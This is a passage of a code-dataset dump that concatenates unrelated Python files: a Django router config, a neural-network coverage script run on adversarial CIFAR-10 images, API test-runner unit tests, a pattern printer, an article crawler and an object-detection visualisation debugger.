x= self.Dropout(F.relu(self.fc2(x)))
x= self.Dropout(F.relu(self.fc3(x)))
x= F.log_softmax(self.fc4(x), dim=1)
return x
model= Grainsize_model()
model.to(device)
return model |
the-stack_0_6124 | from django.urls import path, include
from profiles_api_app import views
from rest_framework.routers import DefaultRouter
# defining a router
router = DefaultRouter()
router.register('HelloViewSet/', views.HelloViewSet, base_name='HelloViewSet')
router.register('profile/', views.UserProfileViewSet)
urlpatterns = [
path('HelloApiView/', views.HelloApiView.as_view()),
path('', include(router.urls)),
]
|
the-stack_0_6125 | from __future__ import print_function
import argparse
import keras
import os
import sys
from keras import models
from keras.models import load_model, Model
from keras.datasets import mnist
from keras.layers import Input
from scipy.misc import imsave
from copy import deepcopy
import random
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
import pandas as pd
from vgg16_CIFAR10 import cifar10vgg
plt.style.use('classic')
from utils import *
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
#calculates the orthant coverage of a certain dataset
def calculate_nth_layer_orthant_coverage(model, test_corpus, model_layer_dict, layer, mean_vector, covariance_matrix, group_size, threshold):
shortened_model = create_shortened_model(model, layer)
for input_path in test_corpus:
#load image
input = preprocess_image(input_path)
#calculate the covereage by updating a layer_output
update_orthant_coverage(input, shortened_model, model_layer_dict,
mean_vector, covariance_matrix, group_size, threshold)
return get_orthant_coverage(model_layer_dict)
def calculate_neuron_coverage(model, test_corpus, model_layer_dict, threshold):
for input_path in test_corpus:
#load image
input = preprocess_image(input_path)
update_neuron_coverage(input, model, model_layer_dict, threshold)
return get_neuron_coverage(model_layer_dict)
if __name__ == "__main__":
model_path = "LeNet-5_200_Epochs.h5"
covariance_matrix_path = "LeNet-5_200_Epochs_6th_layer_data.npycovarianceArray.npy"
mean_vector_path = "LeNet-5_200_Epochs_6th_layer_data.npymean.npy"
base_set_path = "inputs/base_set/cifar10_base_set.npy"
bim_set_path = "inputs/bim/cifar10_bim.npy"
try:#load mean vector and cov array
mean_vector = np.load(mean_vector_path)
covariance_matrix = np.load(covariance_matrix_path)
base_set = np.load(base_set_path)
bim_set = np.load(bim_set_path)
except:
print("FileLoad Error: cannot load mean vector or covariance matrix array")
sys.exit()
inputs_path = "inputs"
threshold = 0.7
group_size = 1
model_name = "cifar10_vgg16"
attack_name = "bim"
vgg = cifar10vgg(train=False)
model = vgg.model
corpus = [input for input in base_set.tolist()]
corpus_len = len(corpus)
base_model_layer_dict = init_neuron_coverage_table(model)
#this vector will be used to plot a graph later
    initial_coverage_vector = [calculate_neuron_coverage(model, corpus, base_model_layer_dict, threshold)[2]]
model_layer_dict = deepcopy(base_model_layer_dict) #make a deepcopy
coverage_vector = deepcopy(initial_coverage_vector)
print("initial coverage is: " + str(coverage_vector))
print(initial_coverage_vector)
corpus = [input for input in bim_set.tolist()]
corpus_len = len(corpus)
coverage_data = pd.DataFrame({"coverage":[]}) #empty dataframe
for i in range(5):
#randomize the corpus paths
random.seed(i)
corpus = random.sample(corpus, len(corpus))
#gradually update the vector (which we will plot)
for input in corpus:
update_neuron_coverage(input, model, model_layer_dict, threshold)
coverage_vector.append(get_neuron_coverage(model_layer_dict)[2])
coverage_data = coverage_data.append(pd.DataFrame({'adversarial images added':range(len(coverage_vector)),"coverage":coverage_vector}))
coverage_vector = deepcopy(initial_coverage_vector)
np.save(model_name+"_"+attack_name+"_neuron"+"_threshold_"+str(threshold).replace('.',',')+"_group_size_"+str(group_size),np.array(coverage_vector))
sns.lineplot(x="adversarial images added",y="coverage",data=coverage_data.reset_index())
plt.savefig("graph of "+model_name+"_"+attack_name+"_neuron"+"_threshold_"+str(threshold).replace('.',',')+"_group_size_"+str(group_size))
plt.clf()
|
the-stack_0_6126 | import os
import unittest
from ate import utils, runner
from ate.context import Context
from ate.exception import ParamsError
class VariableBindsUnittest(unittest.TestCase):
def setUp(self):
self.context = Context()
testcase_file_path = os.path.join(os.getcwd(), 'tests/data/demo_binds.yml')
self.testcases = utils.load_testcases(testcase_file_path)
def test_context_bind_testset_variables(self):
# testcase in JSON format
testcase1 = {
"variable_binds": [
{"GLOBAL_TOKEN": "debugtalk"},
{"token": "$GLOBAL_TOKEN"}
]
}
# testcase in YAML format
testcase2 = self.testcases["bind_variables"]
for testcase in [testcase1, testcase2]:
variable_binds = testcase['variable_binds']
self.context.bind_variables(variable_binds, level="testset")
testset_variables = self.context.testset_shared_variables_mapping
testcase_variables = self.context.get_testcase_variables_mapping()
self.assertIn("GLOBAL_TOKEN", testset_variables)
self.assertIn("GLOBAL_TOKEN", testcase_variables)
self.assertEqual(testset_variables["GLOBAL_TOKEN"], "debugtalk")
self.assertIn("token", testset_variables)
self.assertIn("token", testcase_variables)
self.assertEqual(testset_variables["token"], "debugtalk")
def test_context_bind_testcase_variables(self):
testcase1 = {
"variable_binds": [
{"GLOBAL_TOKEN": "debugtalk"},
{"token": "$GLOBAL_TOKEN"}
]
}
testcase2 = self.testcases["bind_variables"]
for testcase in [testcase1, testcase2]:
variable_binds = testcase['variable_binds']
self.context.bind_variables(variable_binds)
testset_variables = self.context.testset_shared_variables_mapping
testcase_variables = self.context.get_testcase_variables_mapping()
self.assertNotIn("GLOBAL_TOKEN", testset_variables)
self.assertIn("GLOBAL_TOKEN", testcase_variables)
self.assertEqual(testcase_variables["GLOBAL_TOKEN"], "debugtalk")
self.assertNotIn("token", testset_variables)
self.assertIn("token", testcase_variables)
self.assertEqual(testcase_variables["token"], "debugtalk")
def test_context_bind_lambda_functions(self):
testcase1 = {
"function_binds": {
"add_one": lambda x: x + 1,
"add_two_nums": lambda x, y: x + y
},
"variable_binds": [
{"add1": "${add_one(2)}"},
{"sum2nums": "${add_two_nums(2,3)}"}
]
}
testcase2 = self.testcases["bind_lambda_functions"]
for testcase in [testcase1, testcase2]:
function_binds = testcase.get('function_binds', {})
self.context.bind_functions(function_binds)
variable_binds = testcase['variable_binds']
self.context.bind_variables(variable_binds)
context_variables = self.context.get_testcase_variables_mapping()
self.assertIn("add1", context_variables)
self.assertEqual(context_variables["add1"], 3)
self.assertIn("sum2nums", context_variables)
self.assertEqual(context_variables["sum2nums"], 5)
def test_context_bind_lambda_functions_with_import(self):
testcase1 = {
"requires": ["random", "string", "hashlib"],
"function_binds": {
"gen_random_string": "lambda str_len: ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(str_len))",
"gen_md5": "lambda *str_args: hashlib.md5(''.join(str_args).encode('utf-8')).hexdigest()"
},
"variable_binds": [
{"TOKEN": "debugtalk"},
{"random": "${gen_random_string(5)}"},
{"data": '{"name": "user", "password": "123456"}'},
{"authorization": "${gen_md5($TOKEN, $data, $random)}"}
]
}
testcase2 = self.testcases["bind_lambda_functions_with_import"]
for testcase in [testcase1, testcase2]:
requires = testcase.get('requires', [])
self.context.import_requires(requires)
function_binds = testcase.get('function_binds', {})
self.context.bind_functions(function_binds)
variable_binds = testcase['variable_binds']
self.context.bind_variables(variable_binds)
context_variables = self.context.get_testcase_variables_mapping()
self.assertIn("TOKEN", context_variables)
TOKEN = context_variables["TOKEN"]
self.assertEqual(TOKEN, "debugtalk")
self.assertIn("random", context_variables)
self.assertIsInstance(context_variables["random"], str)
self.assertEqual(len(context_variables["random"]), 5)
random = context_variables["random"]
self.assertIn("data", context_variables)
data = context_variables["data"]
self.assertIn("authorization", context_variables)
self.assertEqual(len(context_variables["authorization"]), 32)
authorization = context_variables["authorization"]
self.assertEqual(utils.gen_md5(TOKEN, data, random), authorization)
def test_import_module_functions(self):
testcase1 = {
"import_module_functions": ["tests.data.custom_functions"],
"variable_binds": [
{"TOKEN": "debugtalk"},
{"random": "${gen_random_string(5)}"},
{"data": '{"name": "user", "password": "123456"}'},
{"authorization": "${gen_md5($TOKEN, $data, $random)}"}
]
}
testcase2 = self.testcases["bind_module_functions"]
for testcase in [testcase1, testcase2]:
module_functions = testcase.get('import_module_functions', [])
self.context.import_module_functions(module_functions)
variable_binds = testcase['variable_binds']
self.context.bind_variables(variable_binds)
context_variables = self.context.get_testcase_variables_mapping()
self.assertIn("TOKEN", context_variables)
TOKEN = context_variables["TOKEN"]
self.assertEqual(TOKEN, "debugtalk")
self.assertIn("random", context_variables)
self.assertIsInstance(context_variables["random"], str)
self.assertEqual(len(context_variables["random"]), 5)
random = context_variables["random"]
self.assertIn("data", context_variables)
data = context_variables["data"]
self.assertIn("authorization", context_variables)
self.assertEqual(len(context_variables["authorization"]), 32)
authorization = context_variables["authorization"]
self.assertEqual(utils.gen_md5(TOKEN, data, random), authorization)
def test_register_request(self):
request_dict = {
"url": "http://debugtalk.com",
"method": "GET",
"headers": {
"Content-Type": "application/json",
"USER-AGENT": "ios/10.3"
}
}
self.context.register_request(request_dict)
parsed_request = self.context.get_parsed_request()
self.assertIn("content-type", parsed_request["headers"])
self.assertIn("user-agent", parsed_request["headers"])
request_dict = {
"headers": "invalid headers"
}
with self.assertRaises(ParamsError):
self.context.register_request(request_dict)
def test_get_parsed_request(self):
test_runner = runner.Runner()
testcase = {
"import_module_functions": ["tests.data.custom_functions"],
"variable_binds": [
{"TOKEN": "debugtalk"},
{"random": "${gen_random_string(5)}"},
{"data": '{"name": "user", "password": "123456"}'},
{"authorization": "${gen_md5($TOKEN, $data, $random)}"}
],
"request": {
"url": "http://127.0.0.1:5000/api/users/1000",
"method": "POST",
"headers": {
"Content-Type": "application/json",
"authorization": "$authorization",
"random": "$random"
},
"data": "$data"
}
}
test_runner.init_config(testcase, level="testcase")
parsed_request = test_runner.context.get_parsed_request()
self.assertIn("authorization", parsed_request["headers"])
self.assertEqual(len(parsed_request["headers"]["authorization"]), 32)
self.assertIn("random", parsed_request["headers"])
self.assertEqual(len(parsed_request["headers"]["random"]), 5)
self.assertIn("data", parsed_request)
self.assertEqual(parsed_request["data"], testcase["variable_binds"][2]["data"])
|
the-stack_0_6128 | height = int(input())
for i in range(height,0,-1):
for j in range(i,height):
print(end=" ")
for j in range(1,i+1):
if(i%2 == 0):
print(j,end=" ")
else:
c = chr(j+64)
print(c,end=" ")
print()
# Sample Input :- 5
# Output :-
# A B C D E
#  1 2 3 4
#   A B C
#    1 2
#     A
|
the-stack_0_6129 | """Contains functions to scrap the text from URLs given by Bing."""
import logging
import re
from typing import Tuple, List, Union
from newspaper import Article
from nltk.corpus.reader.wordnet import Synset
from filepath_handler import get_article_dir, get_url_path
logger = logging.getLogger(__name__)
def grab_text(subject: Synset, id_url: Tuple[int, str]) -> Union[str, None]:
"""Main function to crawl text."""
doc_id, url = id_url
filepath = get_article_dir(subject) / f"{doc_id}.txt"
# clean old content
with filepath.open("w+") as f:
f.write("")
try:
article = Article(url, language="en")
article.download()
article.parse()
text = clean_text(article.text)
with filepath.open("w+") as f:
f.write(text)
return text
except Exception as e:
logger.warning(f"Subject {subject.name()} - Could not crawl {url}. Error: {e.args}")
def clean_text(text: str) -> str:
"""Some simple processes to clean the crawled text."""
arr = []
for line in re.compile(r'\n+').split(text):
line = line.strip()
if not line:
continue
line = re.compile(r'\[\d[\d,\- ]*\]').sub("", line) # remove citations
arr.append(line.strip())
return "\n".join(arr)
def get_urls(subject: Synset) -> List[str]:
"""Get all URLs returned by the Bing API."""
url_filepath = get_url_path(subject)
with url_filepath.open() as f:
urls = [line.strip() for line in f.readlines() if line.strip()]
return urls
|
the-stack_0_6131 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import cv2
from .ddd_utils import compute_box_3d, project_to_image, draw_box_3d
class Debugger(object):
def __init__(self, ipynb=False, theme='black',
num_classes=-1, dataset=None, down_ratio=4):
self.ipynb = ipynb
if not self.ipynb:
import matplotlib.pyplot as plt
self.plt = plt
self.imgs = {}
self.theme = theme
colors = [(color_list[_]).astype(np.uint8) \
for _ in range(len(color_list))]
self.colors = np.array(colors, dtype=np.uint8).reshape(len(colors), 1, 1, 3)
if self.theme == 'white':
self.colors = self.colors.reshape(-1)[::-1].reshape(len(colors), 1, 1, 3)
self.colors = np.clip(self.colors, 0., 0.6 * 255).astype(np.uint8)
self.dim_scale = 1
self.names = pano_class_name
num_classes = len(self.names)
self.down_ratio=down_ratio
# for bird view
self.world_size = 64
self.out_size = 384
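  # Rough usage sketch (illustrative; assumes the module-level `color_list`
  # and `pano_class_name` tables are defined elsewhere in this file):
  #   dbg = Debugger(theme='black', down_ratio=4)
  #   dbg.add_img(img, img_id='input')
  #   dbg.add_blend_img(img, dbg.gen_colormap(hm), img_id='pred_hm')
  #   dbg.show_all_imgs(pause=True)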
def add_img(self, img, img_id='default', revert_color=False):
if revert_color:
img = 255 - img
self.imgs[img_id] = img.copy()
def add_mask(self, mask, bg, imgId = 'default', trans = 0.8):
self.imgs[imgId] = (mask.reshape(
mask.shape[0], mask.shape[1], 1) * 255 * trans + \
bg * (1 - trans)).astype(np.uint8)
def show_img(self, pause = False, imgId = 'default'):
cv2.imshow('{}'.format(imgId), self.imgs[imgId])
if pause:
cv2.waitKey()
def add_blend_img(self, back, fore, img_id='blend', trans=0.7):
if self.theme == 'white':
fore = 255 - fore
if fore.shape[0] != back.shape[0] or fore.shape[0] != back.shape[1]:
fore = cv2.resize(fore, (back.shape[1], back.shape[0]))
if len(fore.shape) == 2:
fore = fore.reshape(fore.shape[0], fore.shape[1], 1)
self.imgs[img_id] = (back * (1. - trans) + fore * trans)
self.imgs[img_id][self.imgs[img_id] > 255] = 255
self.imgs[img_id][self.imgs[img_id] < 0] = 0
self.imgs[img_id] = self.imgs[img_id].astype(np.uint8).copy()
'''
# slow version
def gen_colormap(self, img, output_res=None):
# num_classes = len(self.colors)
img[img < 0] = 0
h, w = img.shape[1], img.shape[2]
if output_res is None:
output_res = (h * self.down_ratio, w * self.down_ratio)
color_map = np.zeros((output_res[0], output_res[1], 3), dtype=np.uint8)
for i in range(img.shape[0]):
resized = cv2.resize(img[i], (output_res[1], output_res[0]))
resized = resized.reshape(output_res[0], output_res[1], 1)
cl = self.colors[i] if not (self.theme == 'white') \
else 255 - self.colors[i]
color_map = np.maximum(color_map, (resized * cl).astype(np.uint8))
return color_map
'''
def gen_colormap(self, img, output_res=None):
img = img.copy()
c, h, w = img.shape[0], img.shape[1], img.shape[2]
if output_res is None:
output_res = (h * self.down_ratio, w * self.down_ratio)
img = img.transpose(1, 2, 0).reshape(h, w, c, 1).astype(np.float32)
colors = np.array(
self.colors, dtype=np.float32).reshape(-1, 3)[:c].reshape(1, 1, c, 3)
if self.theme == 'white':
colors = 255 - colors
color_map = (img * colors).max(axis=2).astype(np.uint8)
color_map = cv2.resize(color_map, (output_res[0], output_res[1]))
return color_map
'''
# slow
def gen_colormap_hp(self, img, output_res=None):
# num_classes = len(self.colors)
# img[img < 0] = 0
h, w = img.shape[1], img.shape[2]
if output_res is None:
output_res = (h * self.down_ratio, w * self.down_ratio)
color_map = np.zeros((output_res[0], output_res[1], 3), dtype=np.uint8)
for i in range(img.shape[0]):
resized = cv2.resize(img[i], (output_res[1], output_res[0]))
resized = resized.reshape(output_res[0], output_res[1], 1)
cl = self.colors_hp[i] if not (self.theme == 'white') else \
(255 - np.array(self.colors_hp[i]))
color_map = np.maximum(color_map, (resized * cl).astype(np.uint8))
return color_map
'''
def gen_colormap_hp(self, img, output_res=None):
c, h, w = img.shape[0], img.shape[1], img.shape[2]
if output_res is None:
output_res = (h * self.down_ratio, w * self.down_ratio)
img = img.transpose(1, 2, 0).reshape(h, w, c, 1).astype(np.float32)
colors = np.array(
self.colors_hp, dtype=np.float32).reshape(-1, 3)[:c].reshape(1, 1, c, 3)
if self.theme == 'white':
colors = 255 - colors
color_map = (img * colors).max(axis=2).astype(np.uint8)
color_map = cv2.resize(color_map, (output_res[0], output_res[1]))
return color_map
def add_rect(self, rect1, rect2, c, conf=1, img_id='default'):
cv2.rectangle(
self.imgs[img_id], (rect1[0], rect1[1]), (rect2[0], rect2[1]), c, 2)
if conf < 1:
cv2.circle(self.imgs[img_id], (rect1[0], rect1[1]), int(10 * conf), c, 1)
cv2.circle(self.imgs[img_id], (rect2[0], rect2[1]), int(10 * conf), c, 1)
cv2.circle(self.imgs[img_id], (rect1[0], rect2[1]), int(10 * conf), c, 1)
cv2.circle(self.imgs[img_id], (rect2[0], rect1[1]), int(10 * conf), c, 1)
def add_coco_bbox(self, bbox, cat, conf=1, show_txt=True, img_id='default', teeth_num='0'):
bbox = np.array(bbox, dtype=np.int32)
# cat = (int(cat) + 1) % 80
cat = int(cat)
# print('cat', cat, self.names[cat])
c = self.colors[cat][0][0].tolist()
if self.theme == 'white':
c = (255 - np.array(c)).tolist()
txt = '{}({:.1f})'.format(teeth_num, conf)
font = cv2.FONT_HERSHEY_SIMPLEX
cat_size = cv2.getTextSize(txt, font, 0.5, 2)[0]
cv2.rectangle(
self.imgs[img_id], (bbox[0], bbox[1]), (bbox[2], bbox[3]), c, 2)
if show_txt:
cv2.rectangle(self.imgs[img_id],
(bbox[0], bbox[1] - cat_size[1] - 2),
(bbox[0] + cat_size[0], bbox[1] - 2), c, -1)
cv2.putText(self.imgs[img_id], txt, (bbox[0], bbox[1] - 2),
font, 0.5, (0, 0, 0), thickness=1, lineType=cv2.LINE_AA)
def add_center_point(self, point, img_id='default'):
cv2.circle(self.imgs[img_id], (point[0], point[1]), 3, (255, 255, 255), -1)
def add_coco_hp(self, points, img_id='default'):
points = np.array(points, dtype=np.int32).reshape(self.num_joints, 2)
for j in range(self.num_joints):
cv2.circle(self.imgs[img_id],
(points[j, 0], points[j, 1]), 3, self.colors_hp[j], -1)
for j, e in enumerate(self.edges):
if points[e].min() > 0:
cv2.line(self.imgs[img_id], (points[e[0], 0], points[e[0], 1]),
(points[e[1], 0], points[e[1], 1]), self.ec[j], 2,
lineType=cv2.LINE_AA)
def add_points(self, points, img_id='default'):
num_classes = len(points)
# assert num_classes == len(self.colors)
for i in range(num_classes):
for j in range(len(points[i])):
c = self.colors[i, 0, 0]
cv2.circle(self.imgs[img_id], (points[i][j][0] * self.down_ratio,
points[i][j][1] * self.down_ratio),
5, (255, 255, 255), -1)
cv2.circle(self.imgs[img_id], (points[i][j][0] * self.down_ratio,
points[i][j][1] * self.down_ratio),
3, (int(c[0]), int(c[1]), int(c[2])), -1)
def show_all_imgs(self, pause=False, time=0):
if not self.ipynb:
for i, v in self.imgs.items():
cv2.imshow('{}'.format(i), v)
if cv2.waitKey(0 if pause else 1) == 27:
import sys
sys.exit(0)
else:
self.ax = None
nImgs = len(self.imgs)
fig=self.plt.figure(figsize=(nImgs * 10,10))
nCols = nImgs
nRows = nImgs // nCols
for i, (k, v) in enumerate(self.imgs.items()):
fig.add_subplot(1, nImgs, i + 1)
if len(v.shape) == 3:
self.plt.imshow(cv2.cvtColor(v, cv2.COLOR_BGR2RGB))
else:
self.plt.imshow(v)
self.plt.show()
def save_img(self, imgId='default', path='../'):
cv2.imwrite(path + '{}.png'.format(imgId), self.imgs[imgId])
def save_all_imgs(self, path='./cache/debug/', prefix='', genID=False):
if genID:
try:
idx = int(np.loadtxt(path + '/id.txt'))
      except Exception:
idx = 0
prefix=idx
np.savetxt(path + '/id.txt', np.ones(1) * (idx + 1), fmt='%d')
for i, v in self.imgs.items():
cv2.imwrite(path + '/{}{}.png'.format(prefix, i), v)
def remove_side(self, img_id, img):
if not (img_id in self.imgs):
return
ws = img.sum(axis=2).sum(axis=0)
l = 0
    while l < len(ws) and ws[l] == 0:
      l += 1
r = ws.shape[0] - 1
while ws[r] == 0 and r > 0:
r -= 1
hs = img.sum(axis=2).sum(axis=1)
t = 0
    while t < len(hs) and hs[t] == 0:
t += 1
b = hs.shape[0] - 1
while hs[b] == 0 and b > 0:
b -= 1
self.imgs[img_id] = self.imgs[img_id][t:b+1, l:r+1].copy()
def project_3d_to_bird(self, pt):
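    # Map a ground-plane point (x, z in world units, centred on the camera) to pixel
    # coordinates in the out_size x out_size bird's-eye-view image.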
pt[0] += self.world_size / 2
pt[1] = self.world_size - pt[1]
pt = pt * self.out_size / self.world_size
return pt.astype(np.int32)
def add_ct_detection(
self, img, dets, show_box=False, show_txt=True,
center_thresh=0.5, img_id='det'):
# dets: max_preds x 5
self.imgs[img_id] = img.copy()
    if isinstance(dets, dict):
for cat in dets:
for i in range(len(dets[cat])):
if dets[cat][i, 2] > center_thresh:
cl = (self.colors[cat, 0, 0]).tolist()
ct = dets[cat][i, :2].astype(np.int32)
if show_box:
w, h = dets[cat][i, -2], dets[cat][i, -1]
x, y = dets[cat][i, 0], dets[cat][i, 1]
bbox = np.array([x - w / 2, y - h / 2, x + w / 2, y + h / 2],
dtype=np.float32)
self.add_coco_bbox(
bbox, cat - 1, dets[cat][i, 2],
show_txt=show_txt, img_id=img_id)
else:
for i in range(len(dets)):
if dets[i, 2] > center_thresh:
# print('dets', dets[i])
cat = int(dets[i, -1])
cl = (self.colors[cat, 0, 0] if self.theme == 'black' else \
255 - self.colors[cat, 0, 0]).tolist()
ct = dets[i, :2].astype(np.int32) * self.down_ratio
cv2.circle(self.imgs[img_id], (ct[0], ct[1]), 3, cl, -1)
if show_box:
w, h = dets[i, -3] * self.down_ratio, dets[i, -2] * self.down_ratio
x, y = dets[i, 0] * self.down_ratio, dets[i, 1] * self.down_ratio
bbox = np.array([x - w / 2, y - h / 2, x + w / 2, y + h / 2],
dtype=np.float32)
self.add_coco_bbox(bbox, dets[i, -1], dets[i, 2], img_id=img_id)
def add_3d_detection(
self, image_or_path, dets, calib, show_txt=False,
center_thresh=0.5, img_id='det'):
if isinstance(image_or_path, np.ndarray):
self.imgs[img_id] = image_or_path
else:
self.imgs[img_id] = cv2.imread(image_or_path)
for cat in dets:
for i in range(len(dets[cat])):
cl = (self.colors[cat - 1, 0, 0]).tolist()
if dets[cat][i, -1] > center_thresh:
dim = dets[cat][i, 5:8]
loc = dets[cat][i, 8:11]
rot_y = dets[cat][i, 11]
# loc[1] = loc[1] - dim[0] / 2 + dim[0] / 2 / self.dim_scale
# dim = dim / self.dim_scale
if loc[2] > 1:
box_3d = compute_box_3d(dim, loc, rot_y)
box_2d = project_to_image(box_3d, calib)
self.imgs[img_id] = draw_box_3d(self.imgs[img_id], box_2d, cl)
def compose_vis_add(
self, img_path, dets, calib,
center_thresh, pred, bev, img_id='out'):
self.imgs[img_id] = cv2.imread(img_path)
# h, w = self.imgs[img_id].shape[:2]
# pred = cv2.resize(pred, (h, w))
h, w = pred.shape[:2]
hs, ws = self.imgs[img_id].shape[0] / h, self.imgs[img_id].shape[1] / w
self.imgs[img_id] = cv2.resize(self.imgs[img_id], (w, h))
self.add_blend_img(self.imgs[img_id], pred, img_id)
for cat in dets:
for i in range(len(dets[cat])):
cl = (self.colors[cat - 1, 0, 0]).tolist()
if dets[cat][i, -1] > center_thresh:
dim = dets[cat][i, 5:8]
loc = dets[cat][i, 8:11]
rot_y = dets[cat][i, 11]
# loc[1] = loc[1] - dim[0] / 2 + dim[0] / 2 / self.dim_scale
# dim = dim / self.dim_scale
if loc[2] > 1:
box_3d = compute_box_3d(dim, loc, rot_y)
box_2d = project_to_image(box_3d, calib)
box_2d[:, 0] /= hs
box_2d[:, 1] /= ws
self.imgs[img_id] = draw_box_3d(self.imgs[img_id], box_2d, cl)
self.imgs[img_id] = np.concatenate(
[self.imgs[img_id], self.imgs[bev]], axis=1)
def add_2d_detection(
self, img, dets, show_box=False, show_txt=True,
center_thresh=0.5, img_id='det'):
self.imgs[img_id] = img
for cat in dets:
for i in range(len(dets[cat])):
cl = (self.colors[cat - 1, 0, 0]).tolist()
if dets[cat][i, -1] > center_thresh:
bbox = dets[cat][i, 1:5]
self.add_coco_bbox(
bbox, cat - 1, dets[cat][i, -1],
show_txt=show_txt, img_id=img_id)
def add_bird_view(self, dets, center_thresh=0.3, img_id='bird'):
bird_view = np.ones((self.out_size, self.out_size, 3), dtype=np.uint8) * 230
for cat in dets:
cl = (self.colors[cat - 1, 0, 0]).tolist()
lc = (250, 152, 12)
for i in range(len(dets[cat])):
if dets[cat][i, -1] > center_thresh:
dim = dets[cat][i, 5:8]
loc = dets[cat][i, 8:11]
rot_y = dets[cat][i, 11]
rect = compute_box_3d(dim, loc, rot_y)[:4, [0, 2]]
for k in range(4):
rect[k] = self.project_3d_to_bird(rect[k])
# cv2.circle(bird_view, (rect[k][0], rect[k][1]), 2, lc, -1)
cv2.polylines(
bird_view,[rect.reshape(-1, 1, 2).astype(np.int32)],
True,lc,2,lineType=cv2.LINE_AA)
for e in [[0, 1]]:
t = 4 if e == [0, 1] else 1
cv2.line(bird_view, (rect[e[0]][0], rect[e[0]][1]),
(rect[e[1]][0], rect[e[1]][1]), lc, t,
lineType=cv2.LINE_AA)
self.imgs[img_id] = bird_view
def add_bird_views(self, dets_dt, dets_gt, center_thresh=0.3, img_id='bird'):
alpha = 0.5
bird_view = np.ones((self.out_size, self.out_size, 3), dtype=np.uint8) * 230
for ii, (dets, lc, cc) in enumerate(
[(dets_gt, (12, 49, 250), (0, 0, 255)),
(dets_dt, (250, 152, 12), (255, 0, 0))]):
# cc = np.array(lc, dtype=np.uint8).reshape(1, 1, 3)
for cat in dets:
cl = (self.colors[cat - 1, 0, 0]).tolist()
for i in range(len(dets[cat])):
if dets[cat][i, -1] > center_thresh:
dim = dets[cat][i, 5:8]
loc = dets[cat][i, 8:11]
rot_y = dets[cat][i, 11]
rect = compute_box_3d(dim, loc, rot_y)[:4, [0, 2]]
for k in range(4):
rect[k] = self.project_3d_to_bird(rect[k])
if ii == 0:
cv2.fillPoly(
bird_view,[rect.reshape(-1, 1, 2).astype(np.int32)],
lc,lineType=cv2.LINE_AA)
else:
cv2.polylines(
bird_view,[rect.reshape(-1, 1, 2).astype(np.int32)],
True,lc,2,lineType=cv2.LINE_AA)
# for e in [[0, 1], [1, 2], [2, 3], [3, 0]]:
for e in [[0, 1]]:
t = 4 if e == [0, 1] else 1
cv2.line(bird_view, (rect[e[0]][0], rect[e[0]][1]),
(rect[e[1]][0], rect[e[1]][1]), lc, t,
lineType=cv2.LINE_AA)
self.imgs[img_id] = bird_view
kitti_class_name = [
'p', 'v', 'b'
]
gta_class_name = [
'p', 'v'
]
pascal_class_name = ["aeroplane", "bicycle", "bird", "boat", "bottle", "bus",
"car", "cat", "chair", "cow", "diningtable", "dog", "horse", "motorbike",
"person", "pottedplant", "sheep", "sofa", "train", "tvmonitor"]
coco_class_name = [
'person', 'bicycle', 'car', 'motorcycle', 'airplane',
'bus', 'train', 'truck', 'boat', 'traffic light', 'fire hydrant',
'stop sign', 'parking meter', 'bench', 'bird', 'cat', 'dog', 'horse',
'sheep', 'cow', 'elephant', 'bear', 'zebra', 'giraffe', 'backpack',
'umbrella', 'handbag', 'tie', 'suitcase', 'frisbee', 'skis',
'snowboard', 'sports ball', 'kite', 'baseball bat', 'baseball glove',
'skateboard', 'surfboard', 'tennis racket', 'bottle', 'wine glass',
'cup', 'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple', 'sandwich',
'orange', 'broccoli', 'carrot', 'hot dog', 'pizza', 'donut', 'cake',
'chair', 'couch', 'potted plant', 'bed', 'dining table', 'toilet', 'tv',
'laptop', 'mouse', 'remote', 'keyboard', 'cell phone', 'microwave',
'oven', 'toaster', 'sink', 'refrigerator', 'book', 'clock', 'vase',
'scissors', 'teddy bear', 'hair drier', 'toothbrush'
]
pano_class_name = ['o', 'x']
color_list = np.array(
[
1.000, 1.000, 1.000,
0.850, 0.325, 0.098,
0.929, 0.694, 0.125,
0.494, 0.184, 0.556,
0.466, 0.674, 0.188,
0.301, 0.745, 0.933,
0.635, 0.078, 0.184,
0.300, 0.300, 0.300,
0.600, 0.600, 0.600,
1.000, 0.000, 0.000,
1.000, 0.500, 0.000,
0.749, 0.749, 0.000,
0.000, 1.000, 0.000,
0.000, 0.000, 1.000,
0.667, 0.000, 1.000,
0.333, 0.333, 0.000,
0.333, 0.667, 0.000,
0.333, 1.000, 0.000,
0.667, 0.333, 0.000,
0.667, 0.667, 0.000,
0.667, 1.000, 0.000,
1.000, 0.333, 0.000,
1.000, 0.667, 0.000,
1.000, 1.000, 0.000,
0.000, 0.333, 0.500,
0.000, 0.667, 0.500,
0.000, 1.000, 0.500,
0.333, 0.000, 0.500,
0.333, 0.333, 0.500,
0.333, 0.667, 0.500,
0.333, 1.000, 0.500,
0.667, 0.000, 0.500,
0.667, 0.333, 0.500,
0.667, 0.667, 0.500,
0.667, 1.000, 0.500,
1.000, 0.000, 0.500,
1.000, 0.333, 0.500,
1.000, 0.667, 0.500,
1.000, 1.000, 0.500,
0.000, 0.333, 1.000,
0.000, 0.667, 1.000,
0.000, 1.000, 1.000,
0.333, 0.000, 1.000,
0.333, 0.333, 1.000,
0.333, 0.667, 1.000,
0.333, 1.000, 1.000,
0.667, 0.000, 1.000,
0.667, 0.333, 1.000,
0.667, 0.667, 1.000,
0.667, 1.000, 1.000,
1.000, 0.000, 1.000,
1.000, 0.333, 1.000,
1.000, 0.667, 1.000,
0.167, 0.000, 0.000,
0.333, 0.000, 0.000,
0.500, 0.000, 0.000,
0.667, 0.000, 0.000,
0.833, 0.000, 0.000,
1.000, 0.000, 0.000,
0.000, 0.167, 0.000,
0.000, 0.333, 0.000,
0.000, 0.500, 0.000,
0.000, 0.667, 0.000,
0.000, 0.833, 0.000,
0.000, 1.000, 0.000,
0.000, 0.000, 0.167,
0.000, 0.000, 0.333,
0.000, 0.000, 0.500,
0.000, 0.000, 0.667,
0.000, 0.000, 0.833,
0.000, 0.000, 1.000,
0.000, 0.000, 0.000,
0.143, 0.143, 0.143,
0.286, 0.286, 0.286,
0.429, 0.429, 0.429,
0.571, 0.571, 0.571,
0.714, 0.714, 0.714,
0.857, 0.857, 0.857,
0.000, 0.447, 0.741,
0.50, 0.5, 0
]
).astype(np.float32)
color_list = color_list.reshape((-1, 3)) * 255
|
